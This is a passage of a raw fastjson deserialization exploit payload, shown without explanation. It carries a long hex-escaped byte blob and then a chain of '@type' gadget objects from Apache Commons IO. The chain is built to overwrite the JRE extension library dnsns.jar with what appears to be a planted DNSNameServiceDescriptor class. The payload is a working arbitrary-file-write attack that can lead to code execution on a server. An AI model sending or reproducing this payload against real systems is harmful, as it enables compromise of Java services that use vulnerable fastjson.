49\x56\x5d\x49\x43\x65\x56\x7e\x57\x59\x45\x53\x5b\x75\x63\x43\x68\x48\x6a\x4d\x49\x47\x49\x66\x5d\x49\x43\x65\x66\x41\x7b\x43\x5b\x75\x7d\x45\x68\x48\x74\x63\x6b\x66\x43\x49\x7d\x45\x74\x48\x4b\x42\x48\x6b\x48\x5b\x42\x48\x7b\x48\x47\x68\x48\x54\x67\x75\x43\x79\x63\x67\x42\x48\x67\x48\x57\x68\x48\x4a\x4d\x49\x47\x49\x56\x5d\x49\x43\x65\x56\x61\x5b\x4b\x75\x43\x65\x68\x48\x74\x59\x7d\x79\x66\x45\x57\x45\x68\x48\x58\x56\x59\x68\x48\x74\x56\x69\x75\x43\x56\x6b\x55\x68\x48\x58\x46\x59\x74\x48\x77\x42\x48\x4f\x48\x6f\x42\x48\x5f\x48\x7f\x74\x08\x44\x30\x55\x70\x30\x49\x5a\x55\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x55\x55\x35\x6e\x6e\x6e\x6e\x6e\x6e\x33\x53\x55\x55\x6e\x55\x55\x55\x37\x43\x69\x75\x64\x49\x62\x45\x41\x74\x33\x77\x77\x57\x44\x47\x30\x73\x44\x44\x77\x44\x47\x30\x77\x77\x70\x74\x44\x44\x44\x47\x44\x44\x44\x77\x44\x44\x47\x77\x77\x47\x77\x74\x74\x47\x74\x77\x77\x44\x44\x44\x74\x33\x33\x33\x33\x33\x33\x77\x77\x77\x30\x33\x33\x33\x47\x64\x46\x50\x63\x42\x48\x53\x48\x73\x68\x48\x6a\x45\x61\x43\x61\x46\x7d\x5d\x79\x65\x46\x5e\x51\x61\x55\x55\x49\x4d\x42\x48\x7a\x48\x4b\x68\x48\x58\x41\x56\x42\x48\x6b\x48\x5b\x42\x48\x7b\x48\x43\x42\x48\x7a\x48\x66\x68\x48\x5a\x45\x61\x43\x61\x46\x65\x61\x55\x59\x46\x4e\x65\x61\x6d\x6d\x6e\x75\x61\x71\x49\x4d\x68\x48\x7c\x71\x49\x69\x79\x55\x49\x4e\x65\x61\x6d\x6d\x68\x48\x72\x45\x61\x43\x61\x46\x65\x61\x55\x59\x46\x4e\x65\x61\x6d\x6d\x68\x48\x58\x7e\x76\x74\x48\x47\x42\x48\x67\x48\x57\x42\x48\x77\x48\x4f\x74\x48\x6f\x42\x48\x5f\x48\x7f\x74\x08\x44\x30\x55\x70\x30\x49\x5a\x55\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x55\x55\x35\x6e\x6e\x6e\x6e\x6e\x6e\x33\x53\x55\x55\x6e\x55\x55\x55\x37\x43\x69\x75\x64\x49\x62\x45\x41\x74\x73\x77\x77\x57\x44\x47\x30\x73\x47\x74\x47\x44\x44\x47\x44\x74\x44\x44\x44\x47\x44\x44\x77\x77\x44\x44\x44\x74\x74\x47\x44\x47\x70\x44\x44\x74\x73\x77\x74\x77\x77\x74\x77\x77\x30\x73\x44\x74\x73\x77\x47\x30\x47\x33\x33\x33\x33\x33\x77\x77\x47\x30\x73\x44\x44\x66\x42\x44\x4b\x42\x48\x6b\x48\x5b\x42\x48\x7b\x48\x47\x68\x48\x62\x65\x41\x73\x41\x6a\x55\x41\x4d\x59\x6a\x5e\x61\x65\x49\x51\x63\x42\x48\x67\x48\x57\x42\x48\x77\x48\x4f\x42\x48\x6f\x48\x5f\x68\x48\x5a\x43\x53\x4d\x6a\x4d\x49\x63\x6a\x43\x5d\x45\x6a\x4d\x41\x75\x49\x43\x49\x7d\x73\x45\x51\x49\x6a\x71\x4d\x43\x6a\x76\x6e\x7e\x6e\x41\x75\x49\x7e\x49\x7d\x73\x45\x51\x49\x76\x49\x43\x51\x7d\x45\x5d\x63\x6d\x7d\x68\x48\x7f\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x68\x48\x74\x69\x6d\x7d\x6e\x41\x75\x49\x68\x48\x52\x72\x4e\x65\x41\x73\x41\x6a\x55\x41\x4d\x59\x6a\x7e\x63\x7d\x45\x4d\x59\x7a\x4a\x4e\x65\x41\x73\x41\x6a\x55\x41\x4d\x59\x6a\x56\x55\x41\x43\x43\x7a\x68\x48\x62\x65\x41\x73\x41\x6a\x53\x63\x45\x55\x6a\x66\x41\x43\x09\x44\x30\x55\x70\x30\x49\x5a\x55\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x55\x55\x35\x6e\x6e\x6e\x6e\x6e\x6e\x33\x53\x55\x55\x6e\x55\x55\x55\x37\x43\x69\x75\x64\x49\x62\x45\x41\x74\x33\x77\x77\x77\x75\x74\x74\x44\x77\x44\x44\x44\x74\x74\x74\x47\x44\x44\x47\x44\x74\x74\x44\x44\x47\x44\x44\x74\x77\x44\x44\x47\x74\x44\x74\x44\x47\x44\x44\x44\x47\x44\x44\x47\x77\x47\x77\x77\x74\x77\x77\x74\x77\x77\x47\x33\x33\x33\x33\x33\x77\x77\x47\x30\x33\x33\x33\x33\x73\x44\x66\x42\x44\x51\x61\x68\x48\x5c\x43\x7d\x77\x59\x7d\x6d\x7b\x5d\x7d\x67\x68\x48\x74\x59\x7d\x6d\x7b\x5d\x7d\x67\x68\x48\x42\x79\x5b\x5b\x7d\x67\x69\x4b\x4d\x57\x57\x7d\x57\x68\x48\x76\x5e\x7e\x45\x73\x4d\x6f\x4d\x41\x4f\x77\x53\x4b\x41\x49\x4d\x57\x7d\x51\x61\x4e\x59\x7d\x6d\x7b\x5d\x7d\x67\x71\x68\x48\x66\x73\x4d\x6f\x4d\x41\x4f\x77\x53\x4b\x41\x49\x4d\x57\x7d\x51\x61\x4e\x59\x7d\x6d\x7b\x5d\x7d\x67\x68\x48\x54\x5d\x7d\x6d\x7b\x5d\x7d\x68\x48\x46\x5e\x45\x73\x4d\x6f\x4d\x41\x4b\x4d\x5b\x43\x41\x55\x77\x67\x53\x5b\x43\x71\x7e\x75\x49\x68\x48\x4a\x73\x4d\x6f\x4d\x41\x4b\x4d\x5b\x43\x41\x55\x7f\x57\x77\x7d\x6b\x68\x48\x7c\x43\x7d\x77\x65\x67\x7b\x47\x7d\x67\x77\x7f\x68\x48\x6e\x5e\x45\x73\x4d\x6f\x4d\x41\x4b\x4d\x5b\x43\x41\x55\x77\x67\x53\x5b\x43\x71\x7e\x45\x73\x4d\x6f\x4d\x41\x4b\x4d\x5b\x43\x41\x55\x77\x67\x53\x5b\x43\x71\x68\x48\x7c\x77\x7b\x45\x7b\x5f\x7d\x67\x69\x4d\x57\x7d\x68\x48\x7a\x5e\x7e\x45\x73\x4d\x6f\x4d\x41\x4b\x4d\x5b\x43\x41\x55\x77\x67\x53\x5b\x43\x71\x68\x48\x4c\x6d\x7b\x5b\x77\x4d\x53\x5b\x57\x68\x48\x56\x5e\x45\x73\x4d\x6f\x4d\x41\x4b\x4d\x5b\x43\x41\x69\x63\x4d\x67\x55\x3d\x44\x30\x55\x70\x30\x49\x5a\x55\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x55\x55\x35\x6e\x6e\x6e\x6e\x6e\x6e\x33\x53\x55\x55\x6e\x55\x55\x55\x37\x43\x69\x75\x64\x49\x62\x45\x41\x74\x33\x77\x57\x47\x44\x47\x77\x30\x47\x77\x47\x44\x44\x47\x70\x44\x74\x44\x44\x47\x74\x77\x44\x74\x44\x77\x44\x47\x77\x47\x47\x74\x77\x44\x44\x74\x74\x77\x74\x77\x47\x73\x77\x77\x74\x33\x33\x33\x33\x33\x77\x77\x30\x33\x33\x33\x33\x73\x44\x44\x66\x42\x44\x67\x6f\x7d\x5b\x6d\x7d\x4e\x56\x55\x68\x48\x4a\x73\x4d\x5f\x4d\x76\x4b\x4d\x5b\x43\x76\x69\x6f\x5b\x4f\x53\x6b\x7d\x68\x48\x5c\x43\x7d\x4f\x69\x6f\x5b\x4f\x53\x6b\x7d\x68\x48\x6a\x66\x56\x51\x73\x4d\x5f\x4d\x76\x4b\x4d\x5b\x43\x76\x69\x6f\x5b\x4f\x53\x6b\x7d\x4e\x68\x48\x44\x7d\x7f\x7d\x6d\x68\x48\x66\x66\x75\x51\x73\x4d\x5f\x4d\x76\x4b\x4d\x5b\x43\x76\x59\x4f\x57\x53\x5b\x43\x4e\x56\x51\x73\x4d\x5f\x4d\x76\x4b\x4d\x5b\x43\x76\x49\x57\x7b\x6d\x7d\x77\x77\x4e\x68\x48\x4a\x73\x4d\x5f\x4d\x76\x4b\x4d\x5b\x43\x76\x49\x57\x7b\x6d\x7d\x77\x77\x68\x48\x52\x43\x7d\x4f\x61\x5b\x47\x6f\x4f\x59\x4f\x57\x7d\x4d\x6b\x68\x48\x5a\x66\x56\x51\x73\x4d\x5f\x4d\x76\x53\x7b\x76\x61\x5b\x47\x6f\x4f\x59\x4f\x57\x7d\x4d\x6b\x4e\x68\x48\x7a\x66\x51\x73\x4d\x5f\x4d\x76\x53\x7b\x76\x61\x5b\x47\x6f\x4f\x59\x4f\x57\x7d\x4d\x6b\x4e\x56\x45\x68\x48\x42\x6f\x77\x7d\x7e\x7d\x4b\x53\x6b\x53\x4f\x7d\x57\x68\x48\x46\x66\x51\x73\x4d\x5f\x4d\x76\x4b\x4d\x5b\x43\x76\x59\x4f\x57\x53\x5b\x43\x4e\x56\x51\x73\x4d\x5f\x4d\x76\x6f\x4f\x53\x4b\x76\x59\x6d\x4d\x5b\x5b\x7d\x57\x4e\x68\x48\x44\x5b\x7d\x7f\x4f\x68\x48\x4a\x73\x4d\x5f\x4d\x76\x4b\x4d\x5b\x43\x76\x61\x5b\x4f\x7d\x43\x7d\x57\x68\x48\x44\x79\x65\x49\x41\x68\x48\x4a\x51\x73\x4d\x5f\x4d\x76\x4b\x4d\x5b\x43\x76\x5e\x4b\x4d\x77\x77\x4e\x68\x48\x4a\x43\x7d\x4f\x7e\x7d\x6d\x4b\x4d\x57\x7d\x5d\x71\x7d\x4f\x63\x7b\x5d\x68\x48\x6e\x66\x51\x73\x4d\x5f\x4d\x76\x4b\x4d\x5b\x43\x76\x59\x4f\x57\x53\x5b\x43\x4e\x75\x51\x73\x4d\x5f\x4d\x76\x4b\x4d\x5b\x43\x76\x5e\x4b\x4d\x77\x77\x4e\x56\x51\x73\x4d\x5f\x4d\x76\x4b\x4d\x5b\x43\x76\x57\x3d\x44\x30\x55\x70\x30\x49\x5a\x55\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x55\x55\x35\x6e\x6e\x6e\x6e\x6e\x6e\x33\x53\x55\x55\x6e\x55\x55\x55\x37\x43\x69\x75\x64\x49\x62\x45\x41\x74\x33\x77\x77\x57\x74\x77\x74\x47\x44\x44\x44\x47\x44\x44\x74\x47\x44\x44\x47\x70\x74\x74\x44\x44\x74\x74\x44\x44\x74\x44\x77\x74\x44\x44\x47\x47\x44\x77\x44\x44\x74\x73\x77\x77\x74\x47\x74\x33\x33\x33\x33\x33\x73\x77\x47\x30\x33\x33\x33\x33\x73\x44\x64\x46\x50\x43\x5b\x7d\x6d\x77\x5e\x69\x7d\x77\x53\x47\x5d\x41\x68\x48\x66\x4b\x75\x6f\x75\x5e\x5b\x75\x7b\x63\x5e\x67\x7d\x43\x5b\x7d\x6d\x77\x5e\x69\x7d\x77\x53\x47\x5d\x68\x48\x62\x57\x7d\x77\x61\x6d\x6d\x7d\x57\x57\x73\x4d\x5b\x7d\x68\x48\x44\x4e\x65\x6e\x45\x68\x48\x4a\x4b\x75\x6f\x75\x5e\x5b\x75\x7b\x63\x5e\x79\x53\x67\x7d\x75\x5d\x68\x48\x62\x6d\x4f\x67\x67\x7d\x7b\x77\x79\x53\x67\x7d\x75\x5d\x68\x48\x5a\x4e\x6e\x49\x4b\x75\x6f\x75\x5e\x5b\x75\x7b\x63\x5e\x79\x53\x67\x7d\x75\x5d\x41\x68\x48\x7a\x63\x7d\x77\x51\x47\x7b\x77\x7d\x7f\x77\x51\x5b\x75\x57\x57\x49\x47\x75\x5d\x7d\x67\x68\x48\x56\x4e\x6e\x49\x4b\x75\x6f\x75\x5e\x5b\x75\x7b\x63\x5e\x51\x5b\x75\x57\x57\x49\x47\x75\x5d\x7d\x67\x41\x68\x48\x74\x6f\x75\x5b\x4f\x7d\x59\x43\x68\x48\x46\x4e\x71\x6e\x49\x4b\x75\x6f\x75\x5e\x5b\x75\x7b\x63\x5e\x71\x7b\x77\x7d\x63\x7d\x67\x41\x68\x48\x54\x73\x7b\x6f\x47\x6b\x7d\x68\x48\x7e\x4e\x49\x4b\x75\x6f\x75\x5e\x5b\x75\x7b\x63\x5e\x59\x4d\x4b\x7d\x6d\x77\x41\x55\x49\x4b\x75\x6f\x75\x5e\x5b\x75\x7b\x63\x5e\x59\x4d\x4b\x7d\x6d\x77\x41\x6e\x49\x4b\x75\x6f\x75\x5e\x5b\x75\x7b\x63\x5e\x59\x4d\x4b\x7d\x6d\x77\x41\x68\x48\x7c\x7b\x7d\x5f\x71\x7b\x57\x77\x75\x7b\x6d\x7d\x68\x48\x5a\x4e\x6e\x49\x4b\x75\x6f\x75\x5e\x5b\x75\x7b\x63\x5e\x59\x4d\x4b\x7d\x6d\x77\x41\x48\x76\x48\x6e\x48\x74\x48\x48\x48\x68\x08\x44\x30\x55\x70\x30\x49\x5a\x55\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x55\x55\x35\x6e\x6e\x6e\x6e\x6e\x6e\x33\x53\x55\x55\x6e\x55\x55\x55\x37\x43\x69\x75\x64\x49\x62\x45\x41\x74\x33\x33\x73\x77\x45\x44\x44\x44\x73\x77\x44\x44\x44\x74\x30\x47\x44\x44\x77\x44\x44\x47\x44\x47\x47\x30\x47\x44\x47\x30\x47\x44\x74\x30\x73\x47\x44\x44\x74\x30\x77\x70\x44\x47\x44\x74\x77\x44\x47\x33\x33\x33\x33\x33\x77\x77\x47\x64\x46\x50\x5e\x48\x59\x48\x79\x48\x68\x48\x45\x48\x48\x48\x58\x48\x65\x48\x78\x48\x68\x48\x55\x48\x75\x48\x68\x48\x4d\x48\x48\x48\x6a\x48\x68\x48\x68\x48\x48\x48\x64\x59\x4f\x48\x68\x57\x48\x48\x48\x48\x48\x68\x48\x6d\x48\x5d\x48\x58\x48\x4d\x48\x48\x48\x7b\x48\x44\x48\x54\x48\x48\x48\x5b\x5a\x58\x6f\x48\x78\x73\x6f\x48\x44\x79\x77\x48\x64\x43\x45\x6f\x48\x54\x67\x48\x6b\x43\x5a\x4c\x6f\x48\x78\x73\x5a\x6c\x6f\x48\x5c\x77\x48\x7c\x5a\x42\x77\x48\x62\x47\x48\x4e\x54\x7f\x48\x52\x4b\x78\x5a\x72\x53\x4b\x44\x5a\x4a\x53\x4b\x64\x79\x53\x67\x48\x66\x54\x7f\x48\x52\x4b\x78\x5a\x6a\x53\x4b\x44\x5a\x5a\x53\x4b\x64\x79\x53\x63\x6f\x48\x7a\x65\x77\x48\x46\x77\x48\x66\x7d\x44\x5f\x48\x56\x0b\x44\x30\x55\x70\x30\x49\x5a\x55\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x55\x55\x35\x6e\x6e\x6e\x6e\x6e\x6e\x33\x53\x55\x55\x6e\x55\x55\x55\x37\x45\x69\x75\x64\x49\x62\x45\x41\x74\x33\x73\x75\x74\x33\x77\x77\x44\x77\x47\x44\x47\x74\x77\x44\x44\x47\x30\x47\x44\x77\x44\x44\x74\x44\x44\x74\x30\x33\x33\x33\x33\x33\x33\x47\x74\x47\x44\x77\x47\x74\x74\x33\x33\x33\x33\x33\x77\x77\x77\x76\x46\x50\x76\x44\x67\x48\x66\x5a\x56\x47\x48\x76\x47\x48\x4e\x63\x64\x77\x48\x74\x6b\x76\x64\x67\x48\x6e\x5f\x5b\x48\x68\x48\x48\x48\x5a\x48\x46\x48\x74\x48\x48\x48\x5d\x48\x48\x48\x44\x48\x68\x48\x74\x48\x6c\x48\x7d\x48\x43\x48\x58\x48\x6d\x48\x48\x48\x6b\x48\x54\x48\x78\x48\x48\x48\x73\x5a\x5e\x5a\x7e\x54\x4f\x48\x41\x6b\x78\x5a\x61\x4b\x6b\x44\x7b\x48\x51\x4b\x6b\x64\x7b\x48\x51\x4b\x47\x48\x71\x53\x75\x44\x47\x48\x49\x75\x57\x48\x69\x47\x48\x59\x54\x4f\x48\x79\x6b\x78\x55\x4b\x6b\x44\x78\x57\x48\x45\x4b\x6b\x64\x55\x6f\x57\x48\x45\x4b\x47\x48\x65\x7f\x48\x41\x73\x4d\x47\x08\x44\x30\x55\x70\x30\x49\x5a\x55\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x55\x55\x35\x6e\x6e\x6e\x6e\x6e\x6e\x33\x53\x55\x55\x6e\x55\x55\x55\x77\x43\x69\x75\x64\x49\x62\x45\x41\x74\x33\x33\x33\x33\x77\x77\x57\x44\x47\x47\x30\x33\x47\x47\x30\x73\x77\x30\x33\x33\x33\x33\x73\x33\x33\x33\x33\x33\x77\x77\x47\x30\x67\x46\x50\x4d\x4f\x7f\x48\x48\x48\x48\x48\x7b\x48\x48\x48\x44\x48\x68\x48\x74\x48\x68\x48\x5f\x48\x48\x48\x5c\x48\x68\x48\x77\x48\x57\x48\x6f\x48\x2c\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x08\x00\x00\x00\x00\x00\x4d\x2e\x5a\x4a\x10\x0e\x00\x00\x1a\x09\x00\x00\x3a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x75\x6e\x2f\x6e\x65\x74\x2f\x73\x70\x69\x2f\x6e\x61\x6d\x65\x73\x65\x72\x76\x69\x63\x65\x2f\x64\x6e\x73\x2f\x44\x4e\x53\x4e\x61\x6d\x65\x53\x65\x72\x76\x69\x63\x65\x44\x65\x73\x63\x72\x69\x70\x74\x6f\x72\x2e\x63\x6c\x61\x73\x73\x50\x4b\x05\x06\x00\x00\x00\x00\x00\x00\x01\x00\x68\x00\x00\x00\x68\x0e\x00\x00\x00\x00",
              },
           "encoder": "iso-8859-1",
           "charset": "iso-8859-1",
           "charsetName": "iso-8859-1",
           "bufferSize": 1
        },
        "branch": {
          "@type": "org.apache.commons.io.output.WriterOutputStream",
          "writer": {
            "@type": "org.apache.commons.io.output.LockableFileWriter",
            "file": "/usr/local/openjdk-8/jre/lib/ext/dnsns.jar",
            "charset": "iso-8859-1",
            "encoding": "iso-8859-1",
            "lockDir": "/tmp/test/",
            "append": false
          },
          "decoder": {"@type":"com.alibaba.fastjson.util.UTF8Decoder"},
          "charset":"iso-8859-1",
          "charsetName":"iso-8859-1",
          "bufferSize": 1024,
          "writeImmediately": true
        },
        "closeBranch": true
      }
    },
  "include":true,
  "boms":[{
                  "@type": "org.apache.commons.io.ByteOrderMark",
                  "charsetName": "iso-8859-1",
                  "bytes":[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 